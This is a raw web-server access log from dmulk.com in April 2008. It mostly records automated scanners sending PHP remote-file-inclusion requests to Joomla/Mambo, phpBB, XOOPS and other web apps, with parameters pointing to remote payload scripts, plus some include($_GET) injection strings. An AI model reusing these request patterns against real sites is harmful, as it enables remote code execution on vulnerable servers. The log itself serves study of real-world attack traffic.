67.195.37.167 - - [07/Apr/2008:09:43:45 -0700] "GET /logs/access_080223.log HTTP/1.0" 200 1766993 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:43:46 -0700] "GET /logs/access_071102.log HTTP/1.0" 200 7391 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:44:03 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:44:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:44:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:44:11 -0700] "HEAD /logs/access_071229.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:44:31 -0700] "GET /logs/access_080312.log/claroline/inc/claro_init_header.inc.php?includePath=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:44:31 -0700] "GET /logs/access_080312.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:44:36 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:09:44:52 -0700] "GET /siteadmin/DeleteUser.php?UserID=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:09:44:57 -0700] "GET /logs/siteadmin/DeleteUser.php?UserID=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
84.123.223.221 - - [07/Apr/2008:09:45:02 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:45:08 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:45:26 -0700] "HEAD /logs/access_071228.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
69.159.110.125 - - [07/Apr/2008:09:46:01 -0700] "GET /logs/access_080211.loghttp://spartanteam.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:46:03 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:46:29 -0700] "GET /logs/access_080309.log/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.13.6.70 - - [07/Apr/2008:09:46:51 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:46:56 -0700] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:46:59 -0700] "GET //?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:47:00 -0700] "HEAD /logs/access_080211.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:47:00 -0700] "GET /logs//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 200 42127 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:47:14 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
69.13.6.70 - - [07/Apr/2008:09:47:14 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.0" 200 7355 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:47:15 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:47:37 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:47:38 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:47:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:47:59 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:48:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:48:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
205.234.200.223 - - [07/Apr/2008:09:48:04 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [07/Apr/2008:09:48:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:09:48:13 -0700] "GET /logs//index.php?menu=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
205.234.200.223 - - [07/Apr/2008:09:48:14 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:09:48:16 -0700] "GET //index.php?menu=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:09:48:33 -0700] "GET /logs/includes/messages.inc.php?include_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:09:48:33 -0700] "GET /includes/messages.inc.php?include_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:09:48:54 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:09:48:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:09:48:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:49:14 -0700] "GET /logs/access_080312.log/admin/index.php?o=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:49:14 -0700] "GET /admin/index.php?o=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:49:15 -0700] "GET /logs/admin/index.php?o=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.30.170.102 - - [07/Apr/2008:09:49:18 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:49:59 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:49:59 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:49:59 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:49:59 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:50:00 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:50:00 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:50:00 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:50:00 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:50:00 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:09:50:08 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:09:50:09 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
121.138.102.125 - - [07/Apr/2008:09:50:27 -0700] "GET /logs/access_080211.loghttp://spartanteam.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
67.195.52.42 - - [07/Apr/2008:09:50:27 -0700] "GET /bikes/dteel/140CANON/?N=D HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.129.206 - - [07/Apr/2008:09:50:49 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ciociariaturismo.it/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.206 - - [07/Apr/2008:09:50:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.ciociariaturismo.it/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:51:14 -0700] "GET /logs/access_080119.log/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:51:19 -0700] "GET /logs/access_080329.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.16.16.208 - - [07/Apr/2008:09:51:39 -0700] "GET /logs/access_080306.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:51:52 -0700] "GET /logs/access_080226.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.61 - - [07/Apr/2008:09:52:04 -0700] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:52:51 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:09:52:52 -0700] "GET /logs/access_080226.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:09:53:01 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:09:53:03 -0700] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:53:06 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:09:53:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:53:30 -0700] "GET /logs/access_080329.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:53:32 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.160 - - [07/Apr/2008:09:53:34 -0700] "GET /logs/access_071115.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.19.171.19 - - [07/Apr/2008:09:53:41 -0700] "GET /logs/access_080218.loghttp://spartanteam.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:53:45 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [07/Apr/2008:09:53:59 -0700] "GET /logs/access_080215.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [07/Apr/2008:09:54:00 -0700] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:54:00 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.158.0.5 - - [07/Apr/2008:09:54:14 -0700] "GET //newspublish/include.php?path[docroot]=http://td-sts.ru/modules/echo4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:56:31 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:56:31 -0700] "GET //include.php?path[docroot]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:56:32 -0700] "GET /logs//include.php?path[docroot]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:57:27 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:57:28 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:57:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.67.120.48 - - [07/Apr/2008:09:57:32 -0700] "GET /index.php?incl=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:57:53 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:57:55 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:57:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:09:58:26 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:09:58:27 -0700] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:09:58:28 -0700] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:58:29 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:58:29 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:58:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:58:32 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:58:32 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:58:33 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:09:58:37 -0700] "GET /main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:59:25 -0700] "GET /megumi/ HTTP/1.1" 200 937 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:09:59:32 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:09:59:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:09:59:33 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:09:59:38 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:59:39 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:59:48 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:59:48 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:59:49 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:10:00:02 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
